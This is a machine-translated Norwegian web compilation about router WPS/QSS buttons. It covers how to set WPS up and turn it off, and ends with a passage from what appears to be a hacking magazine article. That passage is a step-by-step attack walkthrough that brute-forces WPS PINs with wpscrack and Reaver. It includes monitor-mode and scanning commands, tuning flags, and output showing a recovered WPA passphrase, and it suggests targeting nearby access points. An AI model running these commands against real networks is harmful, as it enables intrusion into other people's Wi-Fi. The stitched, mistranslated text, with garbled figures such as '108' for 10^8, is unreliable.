Hva betyr knappene på tp link-ruteren. Wps-administrasjon i Asus. Aktivering og konfigurering av Wi-Fi Protected Setup på D-Link

Standard WPS ble laget spesielt for en enkel, rask og viktigst effektiv tilkobling av kompatible enheter til et trådløst Wi-Fi-nettverk.

Jeg skjønner at å skrive om gamle standarder ikke er is i det hele tatt! Og hva om 60 % ikke engang har hørt om en slik standard.

Ofte klager de til meg over at ruteren ble hacket. Selvfølgelig sier eller skriver jeg- BADLE VENN!

Og jeg vil bare minne deg på noen få trivielle tips for å forbedre beskyttelsen av hjemmerutere mot hacking, spesielt WPS.

Hovedformålet er å automatisere prosessen med å sette opp et trådløst Wi-Fi-nettverk, noe som i stor grad forenkler livet til brukere av trådløse enheter.

Og dette er bra, og la oss derfor snakke litt om hvordan du setter opp WPS og så hvorfor mange slår den av.

Å sette opp et trådløst trådløst nettverk med WPS-funksjonen tar minimalt med tid.

For å koble til enheten trenger du bare å trykke på knappen med samme navn og vente på at de trådløse enhetene skal kommunisere med hverandre.

Denne effektive teknologien lar deg konfigurere Wi-Fi-nettverksdriften på svært kort tid.

La meg minne deg på:
Følgende numre skal kjøres inn i adressefeltet: "192.168.0.1". Etter overgangen vil et nytt autorisasjonsvindu dukke opp, der du må skrive inn ordet "admin" i feltene "Brukernavn" og "Passord" eller ønsket hvis du har satt et passord.

Vi gikk, hva er neste ...

Essensen av WPS-teknologien er at alle viktige parametere overføres fra ruteren til kontrolleren etter en spesiell forespørsel.

En slik forespørsel sendes på ulike måter.

Du kan bruke WPS-knappen på ruterpanelet, du kan bruke en spesiell unik PIN-kode, du kan aktivere WPS-funksjonen i ruterinnstillingene.

I noen modeller av rutere er denne knappen kombinert med Reset-knappen, som brukes til å tilbakestille innstillingene. Noen produsenter bruker navnet QSS i stedet for WPS.

Du kan imidlertid fortsatt finne en gadget der WPS-funksjonen ikke er implementert. I tillegg er ikke WPS-knappen plassert på personlige datamaskiner og bærbare datamaskiner, selv om operativsystemet ofte støtter denne teknologien.

Tilstedeværelsen eller fraværet av en WPS-knapp kan påvirke WPS-tilkoblingsmetoden.

Vi venter i 1-2 minutter.

I løpet av denne tiden vil begge enhetene kommunisere med hverandre, og alle nødvendige tilkoblingsparametere vil bli konfigurert i automatisk modus.

Vær oppmerksom på at på noen rutere er WPS- og Reset-knappene kombinert til én.

For å bruke en slik knapp som en WPS, ikke hold den nede i mer enn 4 sekunder, ellers vil den fungere som en tilbakestilling og tilbakestille alle innstillingene til ruteren.

WPS-godkjenningsmetoder:

PBC-modus (Push Button Configuration).
PIN-godkjenning

Hvis både ruteren og den tilkoblede enheten har en WPS-knapp, trenger ikke brukeren å gjøre noen innstillinger i det hele tatt for å koble til Wi-Fi-nettverket.

Trykk og hold inne WPS-knappen på enheten i 2-3 sekunder og slipp. Deretter holder du nede WPS-knappen på ruteren i 2-3 sekunder og slipper.

Små tillegg...

Operativsystemer i Windows-familien, fra Vista SP2, kan skryte av WPS-teknologistøtte. For de operativsystemene som ikke støtter WPS, utgis spesialiserte programvareverktøy som gjør det mulig å bruke WPS for å koble til et Wi-Fi-nettverk.

Oftest er PIN-koden skrevet på etiketten til ruteren og er plassert på bunnpanelet. Denne koden kan endres i ruterinnstillingene.

WPS-knappen er oftest installert på forsiden, siden eller baksiden av ruteren. Du må klemme den i 2-3 sekunder.

Noen ganger er det signert som QSS eller kombinert med Tilbakestill-knappen. I det andre tilfellet er det viktigste å ikke overdrive med tidspunktet for å trykke på knappen, siden det ellers kan fungere å tilbakestille innstillingene.

Når du setter opp et trådløst WPS-nettverk, må du huske eller skrive ned sikkerhetsnøkkelen.

Fordeler med WPS:

Wi-Fi-tilkobling med én knapp
Enkelhet og enkel tilkobling
Høyhastighets tilkobling av enheter til det trådløse nettverket
Muligheten til å konfigurere nettverket uten å gå inn i WEB-grensesnittet
Automatisk tildeling av nettverksnavn og sikkerhetsnøkkel for ruteren
Enheten trenger ikke å vite nettverksnavnet og sikkerhetsnøkkelen for å koble til Wi-Fi

Ulemper med WPS:

Vanskeligheter med å koble en inkompatibel enhet til et nettverk konfigurert med WPS
Ved å bruke brute-force-metoden kan du knekke PIN-koden

Så vi kommer til punktet hvorfor en så god teknologi er farlig å bruke.

Og så, denne teknologien støttes av mange rutere og er den mest sårbare. Representerer en knapp på ruteren, eller en 8-sifret PIN-kode som sender nettverksparametere. Selvfølgelig kan PIN-koden lett være brute-force.

For øyeblikket er den mest relevante hackingmetoden valget av en WPS-pin.

For å brutt force PIN-koden må WPS-modusen være aktivert på ruteren, den er ofte i denne tilstanden, men det hender at den er slått av, men dette garanterer ikke at den faktisk er slått av.

PIN-koden består av åtte sifre - derfor er det 108 (100'000'000) valgmuligheter.
Imidlertid kan antallet alternativer reduseres betydelig.

Faktum er at det siste sifferet i PIN-koden er en slags kontrollsum, som beregnes basert på de første syv sifrene.

Som et resultat får vi allerede 107 (10'000'000) opsjoner. Protokollens sårbarhet lar deg dele pinkoden i to deler, 4 og 3 sifre, og sjekke hver enkelt for gyldighet separat.

Derfor får vi 104 (10'000) opsjoner for første halvår og 103 (1000) for andre. Som et resultat er det bare 11 000 alternativer for et fullstendig søk, som er ~910 ganger mindre.

Innbruddssikring

Det er én måte å forsvare seg mot et angrep så langt - deaktiver QSS WPS i ruterinnstillingene.

For eksempel (TP-Link), skriv inn 192.168.0.1 i nettleserlinjen og trykk Enter. Et vindu vil dukke opp der du må logge inn, det vil si å skrive inn brukernavn og passord.

Lenger i menyen til venstre finner du elementet, som vil snakke om QSS. Finn Deaktiver QSS-knappen.
"Start på nytt". Eller bare koble fra ruteren i noen sekunder - effekten er den samme. Denne håndboken passer for TP-LINK-rutere

Det er sant at dette ikke alltid er mulig. Siden sårbarheten ikke eksisterer på implementeringsnivå, men på protokollnivå.

Det meste produsentene kan gjøre er å gi ut en fastvare som lar en tidsavbrudd angis for å blokkere en bruker, for eksempel etter 5 mislykkede forsøk på å angi en PIN-kode, noe som vil komplisere brute force og øke tiden for en angriper å velge en identifikator .

En annen måte er å bruke ikke bare tall, men også bokstaver i PIN-koden. Seriøst, du må bare innse at alt rundt deg er potensielt sårbart. Det er ingen konspirasjonsteorier eller den mystiske storebroren her.

Hvis du er redd for alt, er det bare å slå av WPS! Det er tryggere for rutere som ikke støtter denne teknologien. WPS er ikke engang en ny oppfinnelse i det hele tatt :) Hovedpoenget i artikkelen handler imidlertid om sikkerhet. Som, det skadet ikke å slå av denne funksjonen hvis du bruker WiFi på overfylte steder (kafeer, butikker, etc.)

Vi leser også:

Lykke til venner!

Den mystiske WPS-knappen på ruteren - hva er det?

På de fleste enheter er WPS-knappen merket eller opplyst vanligvis plassert på siden av dekselet på kontrollpanelet eller på baksiden ved siden av kontaktene.

Grafisk er denne nøkkelen indikert med to bueformede piler som peker mot hverandre. Plasseringen av knappen er vist i fig. nr. 1 og 2.

Det er ikke mange som har en ide om hvordan de skal konfigurere WPS-funksjonen på selve ruteren.

WPS-modus på en ruter - hva er det?

Dette er en standard eller, i fagfolks terminologi, en protokoll. Den ble utviklet i 2007.

WPS står for Wi-Fi Protected Setup - sikker tilkobling til et Wi-Fi-nettverk.

Denne protokollen er spesielt utviklet for uerfarne brukere.

Enkelheten til denne standarden gjør at enhver lekmann kan koble til og uavhengig konfigurere distribusjonen av et trådløst LAN-signal på ruteren.

Dessuten kobler denne modusen automatisk enheten til World Wide Web etter omstart, selv om tilgangspassordet har gått tapt.

WPS-teknologi lar deg automatisk tildele et navn til hjemmenettverket ditt, generere en chiffer for beskyttelse mot uautorisert tilgang og kringkaste et stabilt radiosignal samtidig for flere enheter (smarttelefon, nettbrett, bærbar PC, TV med Smart-alternativ).

Samtidig gir systemet høy hastighet på informasjonsoverføring. Trådløs modus aktiveres forskjellig på forskjellige hjemmebasestasjonsmodeller.

Hvordan WPS-modus fungerer

Kontrollalgoritmen for denne funksjonen er enkel. Å sette opp og installere et trådløst nettverk på nytt innebærer to trinn:

  • konfigurere tilgangspunktet til selve ruteren (ruteren);
  • koble brukere til det opprettede og aktiverte lokale trådløse nettverket.

WPS-protokollen forenkler disse manipulasjonene i stor grad.

Arbeidet konfigureres automatisk ved å overføre nødvendige data fra ruteren til kontrolleren.

I dette tilfellet forblir identifikatoren (navnet) til nettverket - SSID - den samme. Og det nye sikkerhetspassordet genereres tilfeldig av prosessoren.

WPS-protokollen støttes av alle operativsystemer, uten unntak, laget på Windows-plattformen, designet for både stasjonære PC-er og mobile enheter.

For operativsystemer som ikke har integrerte verktøy for WPS, er det utviklet spesielle drivere som lar deg koble til et trådløst nettverk.

Hvordan setter jeg opp et trådløst nettverk?

En av fordelene med WPS-standarden er muligheten til å konfigurere uten å måtte gå inn i det digitale grensesnittet. Det er to alternativer for å aktivere et hjemmenettverk:

  • maskinvare
  1. ved å trykke på WPS-knappen på ruteren; denne automatiske konfigurasjonsmodusen kalles Push button connect;
  2. i mangel av en knapp, kan dens virtuelle versjon finnes i det digitale grensesnittet til enheten
  • program
  1. noen moduler som støtter WPS-protokollen har ikke en automatisk tilbakestillingsknapp på kroppen; for å aktivere nettverket via WEB-grensesnittet, må du angi en åttesifret PIN-kode;
  2. PIN-koden kan også legges inn via en datamaskin (bærbar PC) etter tilkobling til ruteren og aktivering av programøkten.

Råd. PIN-koden er trykt av produsenten på en etikett som er plassert på baksiden eller undersiden av enheten (se fig. 3). I maskinvareinnstillingene kan koden endres av brukeren.

Etter å ha trykket på knappen, vent i to til tre minutter.

I løpet av denne tiden etablerer alle aktiverte enheter kontakt med hverandre, og dermed blir det lokale nettverket konfigurert.

Hvis adapterene til mottaksenhetene også har en WPS-knapp, trykkes den umiddelbart etter at knappen på ruteren er slått på.

Lysindikasjon på ruteren

Hvis WPS-funksjonen på utstyret har en lysindikasjon, kan statusen for tilkoblingen til hjemmenettverket til den innkommende linjen til Internett-nettverket overvåkes visuelt.

Hvis kontakten er brutt eller det ikke er noe signal fra det eksterne nettverket, er indikasjonen på ruteren av.

Hvis lysindikatoren blinker, betyr det at ruteren er i ferd med å konfigurere programmet eller at det er en feil tilkobling av mottaksenheter.

Basestasjonen må kanskje kobles fra og startes på nytt.

Når indikatoren lyser konstant, er signalfordelingen stabil. Denne funksjonelle løsningen brukes på de fleste enheter.

Hvis det ikke er noen WPS-knapp på ruteren?

På noen rutere er knappen for å starte den trådløse signaldistribusjonsprosessen kombinert med knappen for å tilbakestille gjeldende innstillinger (Reset).

Et lignende eksempel kan sees i figuren.

I dette tilfellet, for å konfigurere signalet, må du trykke og holde inne tilbakestillingsknappen for Wi-Fi-innstillinger i 2 sekunder.

Maskinvareinnstillingene slettes etter å holde tasten nede i 5-10 sekunder.

Hvis dette ikke er nødvendig, bør du være forsiktig.

På TP-Link nettverksutstyr kalles Wi-Fi-tilkoblingsfunksjonen QSS, som betyr Quick Secure Setup – rask sikker tilkobling.

Denne funksjonen er allerede fabrikkaktivert som standard.

Hvordan kan jeg deaktivere WPS på ruteren i dette tilfellet?

For dette, også for den påfølgende reinstallasjonen, må du finne fanen "Sikkerhet" i menyen. Statusen "Aktiver" vises i den.

For å deaktivere, velg kommandoen "Deaktiver QSS" eller "Deaktiver WPS" (se fig. 5).

Råd. Når du setter opp WPS på hjemmenettverket, husk eller skriv ned tilgangsnøkkelen.

Andre WPS-knappfunksjoner

Noen ruterprosessorer sørger for en endring i funksjonaliteten til nøkkelen.

Produsentene har tatt en slik beslutning for å optimalisere driften av enheten.

ASUS Wrt-ruterprogramvare gir muligheten til å bruke WPS-nøkkelen kun for å aktivere eller deaktivere signaldistribusjon.

For å gjøre justeringer av fabrikkinnstillingene, gå inn i "Administrasjon"-katalogen via WEB-grensesnittet og åpne fanen "System".

Elementet "WPS-knappadferd" bør omdefineres ved å velge kommandoen "Slå radio".

Forkortelsen WPS på en ruter er en forkortelse for "Wi-Fi Protected Setup". Teknologien ble laget for å forenkle tilkoblingen av ulike enheter til nettverket. Den støttes av nesten alle rutere. Dens største fordel er at du ikke trenger å skrive inn et passord på telefonen eller den bærbare datamaskinen for å koble til. Dette gjelder spesielt når du har glemt Wi-Fi-passordet ditt, og det ikke er mulig å lete i ruterinnstillingene. Artikkelen vil beskrive funksjonen til denne teknologien i detalj, samt gi instruksjoner om hvordan du bruker den.

Hvordan WPS-modus fungerer

Når vi har funnet ut hva WPS er, er det verdt å snakke om algoritmen til denne teknologien. For å opprette et trådløst nettverk, må brukeren konfigurere tilgangspunktet til ruteren og koble til det lokale nettverket til enheten med sikkerhetspassordet.

WPS forenkler denne prosedyren betydelig. Kontrolleren genererer et vilkårlig passord automatisk, og sender det deretter til en enhet som kobles til nettverket via Wi-Fi Protected Setup. Takket være dette trenger du ikke å søke etter nettverket ditt selv og skrive inn passordet manuelt

WPS-protokollen støttes av Windows-operativsystemer og de fleste Android-mobilinnretninger. På de operativsystemene som ikke har innebygde verktøy, kan du laste ned en spesiell driver som utvider funksjonaliteten til systemet.

Bruke WPS (QSS) på en ruter

Du kan koble enheter til ruteren ved hjelp av WPS både maskinvare og programvare. Alt avhenger av dingsen du kobler til det trådløse nettverket.

Maskinvaretilkobling: hva det er og hvordan det brukes

Det første alternativet gir bare to trinn: du må trykke på knappene med riktig betegnelse på ruteren og på den tilkoblede gadgeten. WPS-knappen på en ruter er vanligvis plassert på baksiden av enheten.

I noen tilfeller er knappen kombinert med RESET-funksjonen. Hvis du ikke vil tilbakestille ruteren til fabrikkinnstillingene, må du ikke holde den i mer enn 5 sekunder. Aktiveringen av WPS-funksjonen vil varsle deg med den tilsvarende indikatorlampen på frontpanelet til ruteren.

Tilkobling av programvare for mobiltelefon/nettbrett

Android-operativsystemet inkluderer en WPS-tilkoblingsfunksjon. For å bruke den, følg instruksjonene nedenfor, nemlig:


Hvis alt er gjort riktig, kobles smarttelefonen til ditt lokale nettverk.

Koble til en Windows-enhet

Du kan bruke Wi-fi på den bærbare datamaskinen etter å ha opprettet en forbindelse med ruteren via WPS. For å gjøre dette, følg flere trinn:

Hvis du trenger å deaktivere denne protokollen på rutere, trykker du bare på knappen (hvis den ikke er der, kan du deaktivere WPS på ruteren kun gjennom innstillingene).

Hva du skal gjøre hvis ruteren ikke har en WPS-knapp: eksempler på aktivering

Mange modeller gir ikke maskinvareaktivering av Wi-Fi Protected Setup-protokollen. Dette betyr at tilkoblingen skjer via WEB-grensesnittet. For å gjøre dette, må du gjøre følgende:


Etter å ha fullført disse manipulasjonene, kan du bruke Wi-Fi uten problemer. Ofte er den åttesifrede PIN-kombinasjonen angitt på et klistremerke som er festet til modemets deksel.

Det er et alternativt alternativ for å koble til mobile enheter:


Hvis riktig kombinasjon angis, kobles mobiltelefonen eller nettbrettet til nettverket. Med denne funksjonen kan du koble til Wi-Fi alle enheter som støtter denne protokollen.

Hvordan deaktivere WPS gjennom innstillinger

For å deaktivere, må du klikke på "Deaktiver"-knappen i den aktuelle delen av ruteren eller velge Deaktivert.

For ikke så lenge siden så det ut til at et trådløst nettverk beskyttet med WPA2-teknologi var ganske sikkert. Å finne en enkel nøkkel for å koble til er virkelig mulig. Men hvis du installerer en veldig lang nøkkel, vil verken regnbuetabeller eller til og med GPU-akselerasjon hjelpe deg med å høste den. Men, som det viste seg, er det mulig å koble til et trådløst nettverk uten dette - ved å dra nytte av en nylig funnet sårbarhet i WPS-protokollen.

ADVARSEL

All informasjon presenteres kun for pedagogiske formål. Å trenge seg inn i andres trådløse nettverk kan lett betraktes som en straffbar handling. Tenk med hodet.

Kostnadene ved forenklinger

Det blir stadig færre åpne tilgangspunkter som du ikke trenger å taste inn i det hele tatt for å koble til. Det ser ut til at de snart kan bli inkludert i den røde boken. Hvis en person tidligere kanskje ikke engang visste at et trådløst nettverk kan lukkes med en nøkkel, og beskytter seg mot eksterne tilkoblinger, blir han i økende grad bedt om en slik mulighet. Ta for eksempel tilpasset fastvare som ledende leverandører gir ut for populære rutermodeller for å forenkle oppsettet. Du må spesifisere to ting - brukernavn / passord og ... en nøkkel for å beskytte det trådløse nettverket. Enda viktigere er at OEM-ene selv prøver å holde oppsettsprosessen enkel. Så de fleste moderne rutere støtter WPS-mekanismen (Wi-Fi Protected Setup). Med dens hjelp kan brukeren sette opp et sikkert trådløst nettverk i løpet av sekunder, uten å plage seg selv med det faktum at «et annet sted må du aktivere kryptering og registrere en WPA-nøkkel». Skriv inn en åttesifret symbolsk PIN-kode i systemet, som er skrevet på ruteren - og du er ferdig! Og her, hold fast. I desember snakket to forskere på en gang om alvorlige grunnleggende hull i WPS-protokollen. Det er som en bakdør for enhver ruter. Det viste seg at hvis WPS er aktivert i tilgangspunktet (som i et minutt er aktivert i de fleste rutere som standard), så kan du velge en PIN-kode for tilkobling og trekke ut en nøkkel for tilkobling i løpet av noen timer!

Hvordan fungerer WPS?

Ideen til skaperne av WPS er god. Mekanismen angir automatisk nettverksnavn og kryptering. Dermed trenger ikke brukeren å gå inn i nettgrensesnittet og forholde seg til komplekse innstillinger. Og du kan enkelt legge til hvilken som helst enhet (for eksempel en bærbar datamaskin) til et allerede konfigurert nettverk: hvis du skriver inn PIN-koden riktig, vil den motta alle nødvendige innstillinger. Dette er veldig praktisk, og derfor tilbyr alle de store aktørene på markedet (Cisco / Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nå trådløse rutere med WPS-støtte. La oss finne ut av det litt mer detaljert.

Det er tre alternativer for bruk av WPS:

  1. Trykk-knapp-Koble til (PBC). Brukeren trykker på en spesiell knapp på ruteren (hard) og på datamaskinen (programvare), og aktiverer dermed oppsettprosessen. Vi er ikke interessert i dette.
  2. Tast inn en PIN-kode i webgrensesnittet. Brukeren går inn i det administrative grensesnittet til ruteren gjennom en nettleser og skriver inn en åttesifret PIN-kode skrevet på enhetens deksel (Figur 1), hvoretter konfigurasjonsprosessen finner sted. Denne metoden er mer egnet for den første konfigurasjonen av ruteren, så vi vil heller ikke vurdere den.
  3. Tast inn PIN-koden på brukerens datamaskin (Figur 2). Når du kobler til en ruter, kan du åpne en spesiell WPS-sesjon, der du kan konfigurere ruteren eller få de eksisterende innstillingene hvis du taster inn PIN-koden riktig. Dette er allerede attraktivt. Det kreves ingen autentisering for å åpne en slik økt. Hvem som helst kan gjøre det! Det viser seg at PIN-koden allerede er potensielt mottakelig for et bruteforce-angrep. Men dette er bare blomster.

Sårbarhet

Som jeg nevnte tidligere, er PIN-koden åtte sifre lang - derfor er det 10 ^ 8 (100 000 000) alternativer å velge. Imidlertid kan antallet alternativer reduseres betydelig. Faktum er at det siste sifferet i PIN-koden er en slags kontrollsum, som beregnes basert på de første syv sifrene. Som et resultat får vi allerede 10 ^ 7 (10 000 000) opsjoner. Men det er ikke alt! Ta deretter en nærmere titt på enheten til WPS-autentiseringsprotokollen (Figur 3). Det føles som om det er spesialdesignet for å gi rom for brute force. Det viser seg at PIN-verifisering gjøres i to trinn. Den er delt i to like deler, og hver del kontrolleres separat! La oss se på diagrammet:

  1. Hvis angriperen, etter å ha sendt M4-meldingen, mottok en EAP-NACK som svar, kan han være sikker på at den første delen av PIN-koden er feil.
  2. Hvis han mottok en EAP-NACK etter å ha sendt M6, så er den andre delen av PIN-koden feil. Vi får 10 ^ 4 (10 000) alternativer for første halvdel og 10 ^ 3 (1 000) for andre. Som et resultat har vi bare 11 000 alternativer for et fullstendig søk. For en bedre forståelse av hvordan dette vil fungere, ta en titt på diagrammet.
  3. Et viktig poeng er den mulige hastigheten på søket. Det er begrenset av hastigheten på behandling av WPS-forespørsler av ruteren: noen tilgangspunkter vil returnere et resultat hvert sekund, andre - hvert tiende sekund. Mesteparten av tiden brukes på å beregne den offentlige nøkkelen ved hjelp av Diffie-Hellman-algoritmen; den må genereres før trinn M3. Tiden brukt på dette kan reduseres ved å velge en enkel privat nøkkel på klientsiden, noe som vil forenkle beregningen av andre nøkler ytterligere. Praksis viser at for et vellykket resultat er det vanligvis nok å sortere ut bare halvparten av alle alternativene, og i gjennomsnitt tar brute force bare fire til ti timer.

Første implementering

Den første implementeringen av brute-force som dukket opp var wpscrack-verktøyet (goo.gl/9wABj), skrevet i Python av forskeren Stefan Fiebeck. Verktøyet brukte Scapy-biblioteket, som gjør det mulig å injisere vilkårlige nettverkspakker. Skriptet kan bare kjøres under et Linux-system, etter å ha overført det trådløse grensesnittet tidligere til overvåkingsmodus. Som parametere må du spesifisere navnet på nettverksgrensesnittet i systemet, MAC-adressen til den trådløse adapteren, samt MAC-adressen til tilgangspunktet og dets navn (SSID).

$ ./wpscrack.py --iface mon0 --client 94: 0c: 6d: 88: 00: 00 --bssid f4: ec: 38: cf: 00: 00 --ssid testap -v sniffer begynte å prøve 00000000 forsøk tok 0,95 sekunder prøver 00010009<...>prøver 18660005 forsøk tok 1,08 sekunder prøver 18670004 # funnet 1. halvdel av PIN-forsøk tok 1,09 sekunder forsøk 18670011 forsøk tok 1,08 sekunder<...>prøver 18674095 # fant 2. halvdel av PIN-koden<...>Nettverksnøkkel: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_passphras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Som du kan se, ble først den første halvdelen av PIN-koden valgt, deretter den andre, og til slutt ga programmet en nøkkel klar til bruk for å koble til det trådløse nettverket. Det er vanskelig å forestille seg hvor lang tid det ville tatt å finne en nøkkel av denne lengden (61 tegn) med eksisterende verktøy. Wpscrack er imidlertid ikke det eneste verktøyet for å utnytte sårbarheten, og dette er et ganske morsomt øyeblikk: samtidig jobbet en annen forsker, Craig Heffner fra Tactical Network Solutions, med det samme problemet. Da han så at en fungerende PoC dukket opp på nettet for å implementere angrepet, publiserte han Reaver-verktøyet sitt. Den automatiserer ikke bare WPS-PIN-valgprosessen og trekker ut PSK-nøkkelen, men tilbyr også flere innstillinger slik at et angrep kan utføres mot et bredt utvalg av rutere. I tillegg støtter den mange flere trådløse adaptere. Vi bestemte oss for å ta det til grunn og beskrive i detalj hvordan en angriper kan bruke en sårbarhet i WPS-protokollen for å koble til et sikkert trådløst nettverk.

HVORDAN

Som med ethvert angrep på et trådløst nettverk, trenger vi Linux. Det skal sies her at Reaver er til stede i depotet til det velkjente BackTrack-distribusjonssettet, som i tillegg allerede inkluderer de nødvendige driverne for trådløse enheter. Derfor vil vi bruke den.

Trinn 0. Klargjøring av systemet

BackTrack 5 R1 er tilgjengelig for nedlasting på den offisielle nettsiden som en virtuell maskin for VMware og et oppstartbart ISO-bilde. Jeg anbefaler det siste alternativet. Du kan ganske enkelt skrive bildet til en plate, eller du kan bruke programmet til å lage en oppstartbar USB-flash-stasjon: på en eller annen måte, etter å ha startet opp fra et slikt medium, vil vi umiddelbart ha et system klart til å fungere uten unødvendige problemer.

Wi-Fi Hacking Express Course

  1. WEP (Wired Equivalent Privacy) Den tidligste teknologien for å sikre et trådløst nettverk viste seg å være ekstremt svak. Den kan knekkes på bokstavelig talt noen få minutter ved å bruke svakhetene til RC4-chifferet som brukes i den. Hovedverktøyene her er airodump-ng-snifferen for å samle pakker og aircrack-ng-verktøyet, som brukes direkte til å knekke nøkkelen. Det er også et spesielt weside-ng-verktøy, som generelt bryter alle nærliggende punkter med WEP i automatisk modus.
  2. WPA / WPA2 (trådløs beskyttet tilgang)

Brute force er den eneste måten å finne en nøkkel for et lukket WPA / WPA2-nettverk (og selv da bare hvis det er en dump av det såkalte WPA Handshake, som kringkastes når klienten kobler seg til tilgangspunktet).

Brute-force kan ta dager, måneder og år. For å øke opptellingseffektiviteten ble spesialiserte ordbøker først brukt, deretter ble regnbuetabeller generert, og senere dukket det opp verktøy som brukte NVIDIA CUDA og ATI Stream-teknologier for maskinvareakselerasjon av prosessen ved bruk av GPU. Verktøyene som brukes er aircrack-ng (dictionary brute force), cowpatty (ved å bruke regnbuetabeller), pyrit (ved å bruke et skjermkort).

Trinn 1. Logg inn

Standard pålogging og passord er root: toor. Når du først er i konsollen, kan du trygt starte "X" (det er separate sammenstillinger av BackTrack - både med GNOME og med KDE):

# startx

Trinn 2. Installere Reaver

For å laste ned Reaver trenger vi internett. Derfor kobler vi til patch-ledningen eller konfigurerer den trådløse adapteren (menyen "Programmer> Internett> Wicd Network Manager"). Deretter starter vi terminalemulatoren, hvor vi laster ned den nyeste versjonen av verktøyet gjennom depotet:

# apt-get update # apt-get install reaver

Her må jeg si at versjon 1.3 er i depotet, noe som personlig ikke fungerte riktig for meg. Etter å ha lett etter informasjon om problemet fant jeg et innlegg av forfatteren som anbefaler å oppdatere til høyest mulig versjon ved å sammenstille kildene hentet fra SVN. Dette er generelt sett den mest allsidige installasjonsmetoden (for enhver distribusjon).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Det vil ikke være noen problemer med monteringen under BackTrack - kontrollert personlig. I Arch Linux-distribusjonen som jeg bruker, er installasjonen enda enklere, takket være tilstedeværelsen av den aktuelle PKGBUILD:

$ yaourt -S reaver-wps-svn

Trinn 3. Forberedelse for brute force

For å bruke Reaver må du gjøre følgende:

  • sett den trådløse adapteren i overvåkingsmodus;
  • finn ut navnet på det trådløse grensesnittet;
  • finn ut MAC-adressen til tilgangspunktet (BSSID);
  • sørg for at WPS er aktivert på punktet.

La oss først sjekke at det trådløse grensesnittet generelt er tilstede i systemet:

# iwconfig

Hvis utgangen av denne kommandoen inneholder et grensesnitt med en beskrivelse (vanligvis wlan0), gjenkjente systemet adapteren (hvis den var koblet til et trådløst nettverk for å laste Reaver, er det bedre å avslutte tilkoblingen). La oss sette adapteren i overvåkingsmodus:

# airmon-ng start wlan0

Denne kommandoen oppretter et virtuelt grensesnitt i overvåkingsmodus, navnet vil bli indikert i kommandoutgangen (vanligvis mon0). Nå må vi finne tilgangspunktet for angrepet og finne ut dets BSSID. La oss bruke airodump-ng-verktøyet for avlytting av trådløse sendinger:

# airodump-ng mon0

En liste over tilgangspunkter innenfor rekkevidde vises på skjermen. Vi er interessert i poeng med WPA/WPA2-kryptering og PSK-nøkkelautentisering.

Det er bedre å velge en av de første på listen, siden en god forbindelse med punktet er ønskelig for å utføre et angrep. Hvis det er mange punkter og listen ikke passer på skjermen, kan du bruke et annet velkjent verktøy - kismet, hvor grensesnittet er mer tilpasset i denne forbindelse. Eventuelt kan du sjekke på stedet om WPS-mekanismen er aktivert på vårt utsalgssted. For å gjøre dette følger vaskeverktøyet med Reaver (men bare hvis du tar det fra SVN):

# ./vask -i mon0

Parameteren er navnet på grensesnittet som er byttet til overvåkingsmodus. Du kan også bruke '-f'-alternativet og mate verktøyet en cap-fil opprettet, for eksempel av den samme airodump-ng. Av en eller annen ukjent grunn var ikke vaskeverktøyet inkludert i Reaver-pakken i BackTrack. Forhåpentligvis er denne feilen rettet når denne artikkelen er publisert.

Trinn 4. Start brute force

Nå kan du fortsette direkte til brute force PIN. For å starte Reaver i det enkleste tilfellet trenger du litt. Du trenger bare å spesifisere navnet på grensesnittet (som vi tidligere har overført til overvåkingsmodus) og BSSID for tilgangspunktet:

# reaver -i mon0 -b 00: 21: 29: 74: 67: 50 -vv

"-vv"-bryteren muliggjør utvidet utgang av programmet slik at vi kan forsikre oss om at alt fungerer som det skal.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Venter på beacon fra 00: 21: 29: 74: 67: 50 [+] Tilknyttet 00: 21: 29: 74: 67: 50 (ESSID: linksys) [+] Prøver pin 63979978

Hvis programmet konsekvent sender PIN-er til tilgangspunktet, startet alt bra, og det er fortsatt dumt å vente. Prosessen kan bli forsinket. Den korteste tiden jeg klarte å høste PIN-koden min var omtrent fem timer. Så snart det er valgt, vil programmet gjerne informere deg om det:

[+] Prøver pin 64637129 [+] Nøkkel sprakk på 13654 sekunder [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink $ YouStol3HisCarrot!" [+] AP SSID: "linksys"

Det mest verdifulle her er selvfølgelig WPA-PSK, som du umiddelbart kan bruke til å koble til. Alt er så enkelt at det ikke engang passer inn i hodet mitt.

Kan du beskytte deg selv?

Du kan fortsatt beskytte deg mot et angrep på én måte – slå av WPS nafig i ruterinnstillingene. Sant, som det viste seg, er det ikke alltid mulig å gjøre dette. Siden sårbarheten ikke eksisterer på implementeringsnivå, men på protokollnivå, er det ikke verdt å vente på en tidlig oppdatering fra produsentene som vil løse alle problemene. Det meste de kan gjøre nå er å motvirke brute force så mye som mulig. For eksempel, hvis du blokkerer WPS i én time etter fem mislykkede forsøk på å angi PIN-koden, vil brute-force-angrepet ta omtrent 90 dager. Men et annet spørsmål er, hvor raskt kan en slik oppdatering rulles ut til millioner av enheter som fungerer over hele verden?

Pumping Reaver

I HOWTO har vi vist den enkleste og mest allsidige måten å bruke Reaver-verktøyet på. Implementeringen av WPS er imidlertid forskjellig fra produsent til produsent, så i noen tilfeller kreves ytterligere konfigurasjon. Nedenfor vil jeg gi flere alternativer som kan øke hastigheten og effektiviteten til nøkkeliterasjonen.

  1. Du kan angi kanalnummer og SSID for tilgangspunktet: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -c 11 -e linksys
  2. Alternativet '-dh-small' har en gunstig effekt på brute-force-hastigheten, som setter en liten verdi på den hemmelige nøkkelen, og letter beregningene på tilgangspunktsiden: # reaver -i mon0 -b 00: 01: 02 : 03: 04: 05 -vv - -dh-liten
  3. Standard svartidsavbrudd er fem sekunder. Den kan endres om nødvendig: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -t 2
